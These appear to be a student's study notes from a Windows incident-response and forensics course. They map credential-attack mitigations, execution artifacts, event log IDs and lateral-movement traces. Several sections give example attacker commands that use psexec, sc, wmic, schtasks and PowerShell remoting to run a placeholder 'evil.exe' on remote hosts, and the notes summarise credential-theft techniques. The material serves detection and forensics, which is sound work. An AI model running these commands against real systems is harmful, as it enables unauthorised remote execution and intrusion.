legal contact
 

Day 2 FOR508.2


Evolution of Credential Attack Mitigations in Windows


PtH is limited to NTLM


Windows 7
2008 R2
Windows 8 
2012 R2
Windows 10
  • User Access Control (UAC)
    prevent "hidden" program launches
  • Managed Service Accounts
    service accounts with domain admin rights to combat ticket abuse. (Long and complex, renew 30 days)
  • KB2871997
    Backported many protections in Win8 to Win7 level
  • No caching for CredSSP and other SSO
  • Local admin remote logon restrictions
  • Protected Process
    can only load signed code
  • RDP /restrictedAdmin
    no credentials/hash over the wire
  • Domain Protected Users Group
    Cannot logon using weak authentication
  • Improved cleanup
    after termination of user session
  • Grouped Managed Service Accounts
    Complex passwords, renew after min. 30 days
  • Credential Guard
    Isolate hashes and ticket using security boundery by special virtualization
  • Remote Credential Guard
    protects any account during RDP
  • Device Guard
    application whitelisting to prevent untrusted code from being executed


Credential Availability



Log on at console Interactive 2 yes Includes hardware remote access / lights-out cards and network KVMs.
RUNAS Interactive 2 yes
RUNAS /NETWORK NewCredentials 9 yes Clones current LSA session for local access, but uses new credentials when connecting to network resources.
Remote Desktop (success) RemoteInteractive 10 yes If the remote desktop client is configured to share local devices and resources, those may be compromised as well.
Remote Desktop (failure - logon type was denied) RemoteInteractive 10 - By default, if RDP logon fails credentials are only stored very briefly. This may not be the case if the computer is compromised.
Net use * \\SERVER Network 3 -
Net use * \\SERVER /u:user Network 3 -
MMC snap-ins to remote computer Network 3 - Example: Computer Management, Event Viewer, Device Manager, Services
PowerShell WinRM Network 3 - Example: Enter-PSSession server
PowerShell WinRM with CredSSP NetworkClearText 8 yes New-PSSession server
-Authentication Credssp
-Credential cred
PsExec without explicit creds Network 3 - Example: PsExec \\server cmd
PsExec with explicit creds Network + Interactive 3 + 2 yes PsExec \\server -u user -p pwd cmd
Creates multiple logon sessions.
Remote Registry Network 3 -
Remote Desktop Gateway Network 3 - Authenticating to Remote Desktop Gateway.
Scheduled task Batch 4 yes Password will also be saved as LSA secret on disk.
Run tools as a service Service 5 yes Password will also be saved as LSA secret on disk.
Vulnerability scanners Network 3 - Most scanners default to using network logons, though some vendors may implement non-network logons and introduce more credential theft risk.
IIS "Basic Authentication" NetworkCleartext
(IIS 6.0+)

Interactive
(prior to IIS 6.0)


yes
IIS "Integrated Windows Authentication" Network
- NTLM and Kerberos Providers.
https://docs.microsoft.com/de-de/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN


Hashes

Are primarely used to obfuscate a secret that otherwise be transmitted/stored in clear text.

Hashes are available in the LSASS process and can be extracted with admin privileges. Once dumped, hashes can be cracked or used immediately in a Pass the Hash attack.

Defences:

  • Prevent admin account compromise
  • Stop remote interactive sessions with highly privileged accounts
  • Proper termination of RDP sessions
  • Win8.1+ → force the use of Restricted Admin?
  • Win10 → deploy Remote Credential Guard
  • Upgrade to Windows 10
  • Credential Guard
  • TsPkg, WDigest, etc. -- SSO creds obsolescence
  • Domain Protected Users Group (PtH mitigation)

https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf

Tokens

The system uses an access token to identify the user when a thread interacts with a securable object or tries to perform a system task that requires privileges. 
The SeImpersonate privilege lets tokens be copied from processes. The new token can then be used to authenticate as the new user. A target user or service must be logged on or have running processes.

Defences:

• Prevent admin account compromise
• Stop remote interactive sessions with highly privileged accounts
• Proper termination of RDP sessions
• Win8.1+ →  force the use of Restricted Admin Mode?
• Win10 → deploy Remote Credential Guard
• Account designation of “Account is Sensitive and Cannot be Delegated” in Active Directory
• Domain Protected Users security group accounts do not create delegate tokens


Cached Credentials (SAM.dat)

Stored domain credentials to allow logons when domain controller access is unavailable. Most systems cache the last 10 logon hashes by default. (SAM.dat)

Cached credentials must be cracked. Hashes are salted and case-sensitive, making decryption very slow. These hashes cannot be used for Pass the Hash attacks.

Defences:

• Prevent admin account compromise
• Limit number of cached logon accounts
• SOFTWARE\Microsoft\Windows NT\Current Version\Winlogon (cachedlogonscount value)
• A cachedlogonscount of zero or one is not always the right answer
• Enforce password length and complexity rules
• Brute force cracking is required for this attack
• Domain Protected Users security group accounts do not cache credentials


LSA-Secrects

Credentials stored in the registry (HKEY_LOCAL_MACHINE/Security/Policy/Secretsto allow services or tasks to be run with user privileges. In addition to service accounts, may also hold application passwords like VPN or auto-logon credentials.

Defences:

• Prevent admin account compromise
• Do not employ services or schedule tasks requiring privileged accounts on low trust systems
• Reduce number of services that require domain accounts to execute
• Heavily audit any accounts that must be used
• (Group) Managed Service Accounts


Tickets (Kerberos)

Kerberos issues tickets to authenticated users that can be reused without additional authentication. Tickets are cached in memory and are valid for 10 hours.

Defences:

• Credential Guard (Win10+)
• Domain Protected Users Group (Win8+) – Some attacks
• Remote Credential Guard (Win10+)
• Restricted Admin (Win8+)
• Long & complex passwords on service accounts (to prevent Kerberoasting)
• Change service account passwords regularly
• Group Managed Service Accounts are a great mitigation
• Audit service accounts for unusual activity
• Change KRBTGT password regularly (yearly) CHANGE NEEDS TO BE DONE TWICE TO BE EFFECTIVE

Mitigations:

Attack Type Description Mitigation
Pass the Ticket Steal ticket from memory and pass or
import on other systems
Credential Guard; Remote Credential
Guard
Overpass the
Hash
Use NT hash to request a service ticket
for the same account
Credential Guard; Protected Users Group;
Disable RC4 (any weak) authentication
Kerberoasting Request service ticket for highly
privileged service & crack NT hash
Long and complex service account
passwords; Managed Service Accounts
Golden Ticket Kerberos TGT for any account with no
expiration. Survives full password reset
Protect domain admin accounts; Change
KRBTGT password regularly
Silver Ticket All-access pass for a single service or
computer
Regular computer account password
updates
Skeleton Key Patch LSASS on domain controller to
add backdoor password to any account
Protect domain admin accounts; Smart
card usage for privileged accounts

(some) Detections

Golden Ticket events may have one of these issues:
The Account Domain field is blank when it should be DOMAIN
The Account Domain field is DOMAIN FQDN when it should be DOMAIN.”
–Sean Metcalf, adsecurity.org

Kerberoasting uses RC4 encryption downgrade (Ticket Enc. Type = 0x17)

See FIRST page following 35.

NTDIS.DIT

Active Directory Domain Services (AD DS) database ( \Windows\NTDS\) holds all user and computer account hashes (LM/NT) in the domain. Encrypted, but algorithm is well known and easy to defeat.
The file is locked, so admin access is required to load a driver to access raw disk, or use the Volume Shadow Copy Service.

Defences:

Don’t allow Domain Admin accounts to be compromised.  LOL


Advanced Evidence of Execution



c:\Windows\Prefetch

Description:

• Increases performance of a system by pre-loading code pages of commonly used applications. Cache Manager monitors all files and directories referenced for each application or process and maps them into a .pf file.
Utilized to know an application was executed on a system.
• Limited to 128 files on Win7
• Limited to 1024 files on Win8-10
• (exename)-(hash).pf

limited to 128 files / check file date for first/last execution

The prefetch directory is populated after an application is executed.

Prefetch has historically been the go to indication of process execution. If enabled, it can provide a wealth of useful data in an investigation or incident response. However, since Windows 7, systems with an SSD installed as the OS volume have had prefetch disabled by default during installation. With that said, I have seen plenty of systems with SSDs which have still had prefetch enabled (particularaly in businesses which push a standard image) so it is always worth checking for. Windows Server installations also have Prefetch disabled by default, but the same applies.

Increases performance of a system by pre-loading code pages of commonly used applications. Cache Manager monitors all files and directories referenced for each application or process and maps them into a .pf file.

Utilized to know an application was executed on a system.
• Limited to 128 files on Win7
• Limited to 1024 files on Win8-10
(exename)-(hash).pf


The following registry key can be used to determine if it is enabled:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher
0 = Disabled
1 = Only Application launch prefetching enabled
2 = Only Boot prefetching enabled
3 = Both Application launch and Boot prefetching enabled

Interpretation:
• Each .pf will include last time of execution, number of times run, and device and file handles used by the program
• Date/Time file by that name and path was first executed
- Creation Date of .pf file (-10 seconds)
• Date/Time file by that name and path was last executed
- Embedded last execution time of .pf file
- Last modification date of .pf file (-10 seconds)
- Win8-10 will contain last 8 times of execution

HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\AppCompatCache\AppCompatCache
Need to check for every control set found in the SYSTEM hive.

Description:
• Windows Application Compatibility Database is used by Windows to identify possible application compatibility challenges with executables.
• Tracks the executables’ file name, file size, last modified time Location:

Windows XP ShimCache is limited to 96 entries all versions since then retain up to 1024 entries.
Windows Server 2003 has 512 entries
Windows 7-10, Server 2008/2012/2016 has 1024 entries

The information is retained in memory and is only written to the registry when the system is shutdown. Data can be retrieved from a memory image if available.

The Shimcache tracks metadata such as the full file path, last modified date, and file size
The Shimcache only contains the information prior to the system’s last startup, as current entries are stored only in memory
Use Shimcache along with your timelines to recreate and determine malicious activities
Liears


Win7/8/10
SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache
Interpretation:
Any executable run on the Windows system could be found in this key. You can use this key to identify systems that specific malware was executed on. In addition, based on the interpretation of the time-based data you might be able todetermine the last time of execution or activity on the system.
• Windows 7/8/10 contains at most 1,024 entries
- LastUpdateTime does not exist on Win7/8/10 systems

AMCache / RecentFileCache

"installed and executed programs"


Hunt Evil: Lateral Movement Poster:Evidence of Program Execution

C:\Windows\AppCompat\Programs\Amcache.hve (Windows 7/8/10)

Description:
ProgramDataUpdater (a task associated with the Application Experience Service) uses the registry file Amcache.hve to store data during process creation
Amcache.hve records the recent processes that were run 
Amcache.hve records the programs SHA1 so it can be researched with databases like VirusTotal for easy identifiacation
The Amcache.hve lists the path of the files that’s executed which can then be used to find the executed program

Interpretation:
• Amcache.hve – Keys = Amcache.hve\Root\File\{Volume GUID}\#######
• Entry for every executable run, full path information, File’s $StandardInfo Last Modification Time, and Disk volume the executable was run from
• First Run Time = Last Modification Time of Key
• SHA1 hash of executable also contained in the key

Jump Lists

"executed and used files on WIN7-10"


Hunt Evil: Lateral Movement Poster:Evidence of Program Execution

C:\%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations (Win7/8/10)

Description:
• The Windows 7-10 task bar (Jump List) is engineered to allow users to “jump” or access items they have frequently or recently used quickly and easily. This functionality cannot only include recent media files; it must also include recent tasks.
• The data stored in the AutomaticDestinations folder will each have a unique file prepended with the AppID of the associated application.

Interpretation:
• First time of execution of application.
- Creation Time = First time item added to the AppID file.
• Last time of execution of application with file open.
- Modification Time = Last time item added to the
AppID file.
• List of Jump List IDs → www.forensicswiki.org/wiki/List_of_Jump_List_IDs

HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache. (Windows 2000, Windows XP, Windows Server 2003)
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache (Starting from Windows Vista)

Description:

Each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the 'MuiCache'. 

Stores information about what programs ran under a user account
The user account an executable ran under and it's executable file path

UserAssist

"GUI-based programs executed from the desktop"


Hunt Evil: Lateral Movement Poster:Evidence of Program Execution

NTUSER.DAT HIVE
NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist\{GUID}\Count

Description:
GUI-based programs launched from the desktop are tracked in the launcher on a Windows System.


Interpretation:
All values are ROT-13 Encoded
• GUID for Win7/8/10
- CEBFF5CD Executable File Execution
- F4E57C4B Shortcut File Execution

NTUSER.DAT\Software\Microsoft\Windows\Current Version\Search\RecentApps (Win10)

Description:
Program execution launched on the Win10 system is tracked in the RecentApps key

Interpretation:
Each GUID key points to a recent application.
AppID = Name of Application
LastAccessTime = Last execution time in UTC
LaunchCount = Number of times executed

BAM/DAM

"Background Application monitoring of executions on Win10"


Hunt Evil: Lateral Movement Poster:Evidence of Program Execution

(Win10) SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}
(Win10) SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}

Description:
Windows Background Activity Moderator (BAM)

Investigative Notes
Provides full path of the executable file that was run on the system and last execution date/time


Event Logs


Forensic ID's

ID Action Error code Reason
4624 Successful Logon

4625 Unsuccessful Logon 0x6 Invalid Username


0x7 Requested server not found


0xC Policy restriction


0x12 Account locked, disabled or expired


0x17 Password expired


0x18 Invalid password


0x25 timesync issue
4634 Sucessful Logoff

4647 Logoff initiated (better than 4634)

4648 Logon using RunAs

4672 Administrative Logon

4720 New Account created





4722 A user account was enabled

4724

Attempt to reset an accounts password



4728 member added to security enabled global group

4732 member added to security enabled local group

4735 Security enabled local group was changed

4738 User account was changed

4756 member added to security enabled universal group





4778 RDP session reconnected

4779 RDP session disconnected

Location

OS Type default Location Registry holding location of file
NT / Win2000 / XP / Server 2003  .evt %systemroot%\System32\config

HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\System
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Security

Vista / Win7 / Win8 / 2008 / 2012 / Win10 / 2016 .evtx %systemroot%\System32\winevt\logs HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\System
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Security

Logon Types

Type Source Description
2 Interactive A logon at the console of a computer, whether with a domain account or a local
account from the computer’s local SAM. To tell the difference, look for the domain
or computer name preceding the user name in the event’s description.
3 Network When accessing a computer from elsewhere on the network. Most commonly
connections to shared folders or printers, and other over-the-network logons.
4 Batch Logon sessions created by Windows when it executes a scheduled task to run it
under the authority of the specified user account. Other job scheduling systems may
also generate type 4 logon events when starting jobs.
5 Service Similar to scheduled tasks, each service is configured to run as a specified user
account. When a service starts, Windows first creates a logon session which results in
a type 5 logon event.
6 n.a.
7 Unlock When a user returns to their workstation and attempts to unlock the console from the
password protected screen saver mode, Windows treats this as a logon and logs the
event as type 7.
8 Network Cleartext Indicates a network logon, like logon type 3, but where the password was sent over
the network as clear text. Windows server doesn’t allow connection to shared file or
printers with clear text authentication. These logons can happen from within an ASP
script using the ADVAPI or when a user logs on to IIS using IIS’s basic authentication
mode. In both cases the logon process in the event’s description will list advapi.
9 New Credentials If you use the RunAs command to start a program under a different user account and
specify the /netonly switch, Windows records a logon/logoff event with logon type 9.
10 Remote Interactive When you access a computer through Terminal Services, Remote Desktop or Remote
Assistance, Windows logs the logon attempt with logon type 10. (Prior to XP,
Windows 2000 doesn’t use logon type 10 and Terminal Services logons are reported
as logon type 2.
11 Cached Interactive Cached logons facilitate mobile users. Windows caches a hash of the last 10
interactive domain logon credentials . Later, when you are not connected to your
organization’s network and attempt to logon to your laptop with a domain account
and there’s no domain controller available for verification, Windows uses these hashes
to verify your identity.



Use the logon ID to link a logON ( 4624) with a logOFF (better 4647) to determine the session length.

Workstation Logons are "Logon Events"
DC (i.e. Kerberos) verifications of credentials are " Account Logon Events"

Eventlog: tracking Reconnaissssance

Tracking Account and Group enumeration

ID Action
4798 A users local group membership was enumerated
4625 A securityenabled local group membership was enumerated

Check the process name within the event to unviel the programm used

Eventlog: tracking Lateral Movement

Network Shares

ID Action
5140 A network share was accessed
5145 A shared object was accessed
Auditing netw. shares must be enabled and this evt. can be very noisy

RunAs

ID Action
4648 RunAS issued (mostly loged only at the source system)

Schedules Tasks

ID Action
4698 Scheduled task created
4702 Scheduled task updated
4699 Scheduled task deleted
201 Scheduled task executed or completed
4701 Scheduled task enabled or disabled

Eventlog: Suspicous Services

Can be an indicator of persistance (service failure recovery,dll hijacking, service replacement, etc.)

ID Action
7034 Service crashed unexpectedly
7035 Service sent a start/stop control
7036 Service started or stoped
7040 Start type has changed
7045 (Win2008R+) A new service was installed
4697 A new service was installed (security.log)

EventLog cleaning

ID Action
1102 Audit log cleared (Security log)
104 Audit log cleared (System log)

Althought it's usually all-or-nothing to be cleared, it might be worth evaluating the a manipulation like Danderspritz

Mitigation:

  • Event log forwarding (i.e. Splunk)
  • Logging heartbeat
  • Log gap analysis


Lateral Movement


Copy Malware



Source

Destination

Remote Desktop Services

Hunt Evil: Lateral Movement Poster: Remote Desktop

mstsc /v:(Destination)


Souce Event logs

Source ID Action
security.evtx 4648

– Logon specifying alternate
credentials - if NLA enabled on
destination

  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-TerminalServices-RDPClient%4Operational.evtx 1024 Destination Host Name
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-TerminalServices-RDPClient%4Operational.evtx 1102 Destination IP Address


Source Registry

Type IOC Remarks
Remote desktop destinations are tracked per-user NTUSER\Software\Microsoft\TerminalServer Client\Servers
ShimCache – SYSTEM mstsc.exe Remote Desktop Client
BAM/DAM – SYSTEM mstsc.exe Last Time Executed
AmCache.hve mstsc.exe First Time Executed
UserAssist – NTUSER.DAT mstsc.exe
  • Last Time Executed
  • Number of Times Executed
RecentApps – NTUSER.DAT mstsc.exe
  • Last Time Executed
  • Number of Times Executed
  • RecentItems subkey tracks
    connection destinations and times


Source File System

Type IOC Remarks

Jumplists:

C:\Users\\ AppData\Roaming\Microsoft\Windows\ Recent\AutomaticDestinations\

{MSTSC-APPID}- automaticDestinations-ms


Tracks remote desktop connection destination and times

Prefetch:

C:\Windows\Prefetch\ mstsc.exe-{hash}.pf

mstsc.exe-(hash).pf 

first/last execution

Bitmap Cache

C:\USERS\\ AppData\Local\Microsoft\Terminal Server Client\Cache

bcache##.bmc
cache####.bin

Check bmc-tools


Target Event logs

Source ID Action
security.evtx 4624 Logon Type 10
Source IP/Logon User Name
security.evtx 4778/9 IP Address of Source/Source
System Name
Logon User Name
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-Microsoft-WindowsRemoteDesktopServicesRdpCoreTS%4Operational.evtx 131 Connection Attempts
Source IP
%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-Microsoft-WindowsRemoteDesktopServicesRdpCoreTS%4Operational.evtx 98 Successful Connections
Microsoft-Windows-Terminal Services-RemoteConnection Manager%4Operational.evtx 1149 Source IP/Logon User Name
Blank user name may indicate use of Sticky Keys
Microsoft-Windows-Terminal Services-LocalSessionManager%4Operational.evtx

21
22
25

Source IP/Logon User Name
Microsoft-Windows-Terminal Services-LocalSessionManager%4Operational.evtx 41 Logon User Name


Target Registry

Type IOC Remarks
ShimCache – SYSTEM rdpclip.exe
ShimCache – SYSTEM tstheme.exe
AmCache.hve rdpclip.exe
AmCache.hve tstheme.exe


Target File System

Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ mstsc.exe-{hash}.pf

rdpclip.exe-{hash}.pf
tstheme.exe-{hash}.pf 

first/last execution


Source

Destination

Windows Admin Shares (C$ - ADMIN$ - IPC$)

Hunt Evil: Lateral Movement Poster:Map Network Shares


net use z: \\host\c$ /user:domain\username


C$ - Drive volume shares

ADMIN$ - %WINDOWSROOT%

IPC$ - Named Pipes

Source Event logs

Source ID Action
security.evtx 4648

Logon specifying alternate credentials

  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
Microsoft-WindowsSmbClient%4Security.evtx 31001

Failed logon to destination

  • Destination Host Name
  • User Name for failed logon
  • Reason code for failed destination logon (e.g. bad password)


Source Registry

Type IOC Remarks
MountPoints2 NTUSER\Software\Microsoft\Windows\
CurrentVersion\Explorer\MountPoints2
Remotely mapped shares
Shellbags  - USERCLASS.DAT
Remote folders accessed inside an interactive session via
Explorer by attackers
ShimCache – SYSTEM

net.exe
net1.exe

Remote Desktop Client
BAM/DAM – SYSTEM net.exe
net1.exe
Last Time Executed
AmCache.hve net.exe
net1.exe
First Time Executed


Source File System

Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ 

net.exe-{hash}.pf
net1.exe-{hash}.pf

first/last execution

User Profile Artifacts



Review shortcut files and jumplists for remote files accessed by attackers, if they
had interactive access (RDP)


Target Event logs

Source ID Action
security.evtx 4624

Logon Type 3
Source IP/Logon User Name

security.evtx 4672
  • Logon User Name
  • Logon by user with administrative rights
  • Requirement for accessing default shares such as C$
    and ADMIN$
security.evtx 4776 NTLM if authenticating to Local System
Source Host Name/Logon User Name
security.evtx 4768 TGT Granted
Source Host Name/Logon User Name
(Available only on domain controller)
security.evtx 4769

Service Ticket Granted if authenticating to Domain Controller

  • Destination Host Name/Logon User Name
  • Source IP
  • Available only on domain controller
security.evtx 5140 Share Access
security.evtx 5145 Auditing of shared files – NOISY



Target Registry

Type IOC Remarks











Target File System

Type IOC Remarks

File Creation



  • Attacker's files (malware) copied to
    destination system
  • Look for Modified Time before Creation Time
  • Creation Time is time of file copy

Execute Malware



Source

Destination

PsExec System Artifacts

Hunt Evil: Lateral Movement Poster: PsExec



psexec.exe \\host -accepteula -d -c c:\temp\evil.exe


Source Event logs

Source ID Action
security.evtx 4648

Logon specifying alternate credentials

  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name


Source Registry

Type IOC Remarks
NTUSER.DAT Software\SysInternals\PsExec\EulaAccepted
ShimCache – SYSTEM

psexec.exe


BAM/DAM – SYSTEM * psexec.exe Last Time Executed
AmCache.hve * psexec.exe First Time Executed


Source File System

Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ 

psexec.exe-{hash}.pf

Possible references to other files accessed
by psexec.exe, such as executables copied to
target system with the “-c” option

first/last execution

File Creation


psexec.exe

file downloaded and created on local host as the file is not native to Windows


Target Event logs

Source ID Action
security.evtx 4648

Logon specifying alternate credentials

  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
security.evtx 4624

Logon Type 3 (and Type 2 if “-u” Alternate Credentials are used)

  • Source IP/Logon User Name
security.evtx 4672
  • Logon User Name
  • Logon by a user with administrative rights
  • PsExec requires for access default shares such as C$ and ADMIN$
security.evtx 5140
  • ADMIN$ share used by PsExec
security.evtx 7045
  • Service Install


Target Registry

Type IOC Remarks
New service creation
configured
SYSTEM\CurrentControlSet\Services\PSEXESVC “-r” option can allow attacker to rename service
ShimCache – SYSTEM

psexesvc.exe


AmCache.hve psexesvc.exe First Time Executed


Target File System

Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ 

  • psexesvc.exe-{hash}.pf
  • evil.exe-{hash}.pf

first/last execution

File Creation


  • User profile directory structure created unless “-e” option used
  • psexesvc.exe will be placed in ADMIN$ (\Windows) by default, as well as other executables (evil.exe)
    pushed by PsExec


Source

Destination

Windows Remote Management Tools: Remote Services

Hunt Evil: Lateral Movement Poster: Services



sc \\host create servicename binpath= “c:\temp\evil.exe”
sc \\host start servicename


Source Event logs

Source ID Action




Source Registry

Type IOC Remarks
ShimCache – SYSTEM

sc.exe


AmCache.hve sc.exe First Time Executed


Source File System

Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ 

  • sc.exe-{hash}.pf

first/last execution


Target Event logs

Source ID Action
security.evtx 4624

Logon Type 3 (and Type 2 if “-u” Alternate Credentials are used)

  • Source IP/Logon User Name
security.evtx 4697
  • Security records service install,if enabled
  • Enabling non-default Security events such as ID 4697 are particularly useful if only the Security logs are forwarded to a centralized log server
system.evtx 7034
  • Service crashed unexpectedly
system.evtx 7035
  • Service sent a Start/Stop control
system.evtx 7036
  • Service started or stopped
system.evtx 7040
  • Start type changed (Boot | On Request | Disabled)
system.evtx 7045
  • A service was installed on the system


Target Registry

Type IOC Remarks
New service creation SYSTEM\CurrentControlSet\Services\
ShimCache – SYSTEM

evil.exe

ShimCache records
existence of malicious
service executable, unless
implemented as a service DLL
AmCache.hve evil.exe First Time Executed


Target File System

Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ 

  • evil.exe-{hash}.pf

first/last execution

File Creation


  • evil.exe or evil.dll

malicious
service executable or service DLL


Source

Destination

Windows Remote Management Tools: WMI/WMIC

Hunt Evil: Lateral Movement Poster: WMI/WMIC

 
wmic /node:host process call create "C:\temp\evil.exe"
Invoke-WmiMethod –Computer host –Class Win32_Process –Name create –Argument "c:\temp\evil.exe"


Source Event logs

Source ID Action
security.evtx 4648

Logon specifying alternate credentials

  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
security.evtx 4697
  • Security records service install,if enabled
  • Enabling non-default Security events such as ID 4697 are particularly useful if only the Security logs are forwarded to a centralized log server


Source Registry

Type IOC Remarks
ShimCache – SYSTEM

wmic.exe


BAM/DAM – SYSTEM wmic.exe Last Time Executed
AmCache.hve wmic.exe First Time Executed




Source File System

Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ 

  • wmic.exe-{hash}.pf

first/last execution


Target Event logs

Source ID Action
security.evtx 4624

Logon Type 3

  • Source IP/Logon User Name
security.evtx 4672
  • Logon User Name
  • Logon by an a user with administrative rights
Microsoft-Windows-WMIActivity%4Operational.evtx 5857
  • Indicates time of wmiprvse execution
    and path to provider DLL – attackers
    sometimes install malicious WMI
    provider DLLs
Microsoft-Windows-WMIActivity%4Operational.evtx 5860
5861
  • Registration of Temporary (5860) and
    Permanent (5861) Event Consumers.
    Typically used for persistence, but
    can be used for remote execution.


Target Registry

Type IOC Remarks
ShimCache – SYSTEM
  • wmiprvse.exe
  • evil.exe
  • mofcomp.exe

AmCache.hve
  • wmiprvse.exe
  • evil.exe
  • mofcomp.exe
First Time Executed


Target File System

Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ 

  • evil.exe-{hash}.pf
  • wmiprvse.exe-{hash}.pf
  • mofcomp.exe-{hash}.pf

first/last execution

File Creation


  • evil.exe
  • evil.mof

.mof files can be used to manage the WMI Repository

Changes in:

C:\Windows\
System32\wbem\Repository

  • C:\Windows\System32\wbem\Repository
Unauthorized changes to the
WMI Repository


Source

Destination

Windows Remote Management Tools: Scheduled Tasks

Hunt Evil: Lateral Movement Poster: Scheduled Tasks



at \\host 13:00 "c:\temp\evil.exe"
schtasks /CREATE /TN taskname /TR c:\temp\evil.exe /SC once /RU “SYSTEM” /ST 13:00 /S host /U username


Source Event logs

Source ID Action
security.evtx 4648

Logon specifying alternate credentials

  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
security.evtx 4697
  • Security records service install,if enabled
  • Enabling non-default Security events such as ID 4697 are particularly useful if only the Security logs are forwarded to a centralized log server


Source Registry

Type IOC Remarks
ShimCache – SYSTEM
  • at.exe
  • schtasks.exe

BAM/DAM – SYSTEM
  • at.exe
  • schtasks.exe
Last Time Executed
AmCache.hve
  • at.exe
  • schtasks.exe
First Time Executed




Source File System


Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ 

  • at.exe-{hash}.pf
  • schtasks.exe-{hash}.pf

first/last execution


Target Event logs

Source ID Action
security.evtx 4624

Logon Type 3

  • Source IP/Logon User Name
security.evtx 4672
  • Logon User Name
  • Logon by an a user with administrative rights
Microsoft-Windows-WMIActivity%4Operational.evtx 5857
  • Indicates time of wmiprvse execution
    and path to provider DLL – attackers
    sometimes install malicious WMI
    provider DLLs
Microsoft-Windows-WMIActivity%4Operational.evtx 5860
5861
  • Registration of Temporary (5860) and
    Permanent (5861) Event Consumers.
    Typically used for persistence, but
    can be used for remote execution.


Target Registry

Type IOC Remarks
SOFTWARE
  • Microsoft\Windows
    NT\CurrentVersion\
    Schedule\TaskCache\Tasks
  • Microsoft\Windows
    NT\CurrentVersion\
    Schedule\TaskCache\Tree\

ShimCache – SYSTEM
  • evil.exe

AmCache.hve
  • evil.exe
First Time Executed


Target File System

Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ 

  • evil.exe-{hash}.pf

first/last execution

File Creation


  • evil.exe
  • Job files created in C:\Windows\Tasks
    XML task files created in C:\Windows\System32\Tasks
  • Author tag under "RegistrationInfo" can identify:
  • Source system name
  • Creator username



Source

Destination

Windows Remote Management Tools: PowerShell Remoting

Hunt Evil: Lateral Movement Poster: PowerShell Remoting



Enter-PSSession –ComputerName host
Invoke-Command –ComputerName host –ScriptBlock {Start-Process c:\temp\evil.exe}


Source Event logs

Source ID Action
security.evtx 4648

Logon specifying alternate credentials

  • Current logged-on User Name
  • Alternate User Name
  • Destination Host Name/IP
  • Process Name
Microsoft-WindowsWinRM%4Operational.evtx 6

WSMan Session initialize

  • Session created
  • Destination Host Name or IP
  • Current logged-on User Name
Microsoft-WindowsWinRM%4Operational.evtx 8
15
16
33

WSMan Sessiondeinitialization

  • Closing of WSMan session
  • Current logged-on User Name
Microsoft-WindowsPowerShell%4Operational.evtx 40961
40962
  • Records the local initiationof powershell.exe and associated user account
Microsoft-WindowsPowerShell%4Operational.evtx 8193
8194
  • Session created
Microsoft-WindowsPowerShell%4Operational.evtx 8197

Connect

  • Session closed


Source Registry

Type IOC Remarks
ShimCache – SYSTEM
  • powershell.exe

BAM/DAM – SYSTEM
  • powershell.exe
Last Time Executed
AmCache.hve
  • powershell.exe
First Time Executed



Source File System

Type IOC Remarks

Prefetch:

C:\Windows\Prefetch\ 

  • powershell.exe-{hash}.pf

first/last execution

PowerShell scripts (.ps1 files) that run within
10 seconds of powershell.exe launching will be
tracked in powershell.exe prefetch file

Command history:

C:\USERS\\AppData\Roaming\ Microsoft\Windows\PowerShell\ PSReadline\

  • ConsoleHost_history.txt
With PS v5+, a history file with previous 4096
commands is maintained per user


Target Event logs

Source ID Action
security.evtx 4624

Logon Type 3

  • Source IP/Logon User Name
security.evtx 4672
  • Logon User Name
  • Logon by an a user with administrative rights
Microsoft-WindowsPowerShell%4Operational.evtx 4103
4104

Script Block logging

  • Logs suspicious scripts by default in PS v5
  • Logs all scripts if configured
Microsoft-WindowsPowerShell%4Operational.evtx 53504
  • Records the authenticating user
Windows PowerShell.evtx 400
403
  • "ServerRemoteHost" indicates start/end of Remoting session
Windows PowerShell.evtx 800
  • Includes partial script code
Microsoft-WindowsWinRM%4Operational.evtx 91
  • Session creation
Microsoft-WindowsWinRM%4Operational.evtx 168
  • Records the authenticating user



Target Registry

Type IOC Remarks
ShimCache – SYSTEM
  • wsmprovhost.exe
  • evil.exe

AmCache.hve
  • wsmprovhost.exe
  • evil.exe
First Time Executed
SOFTWARE
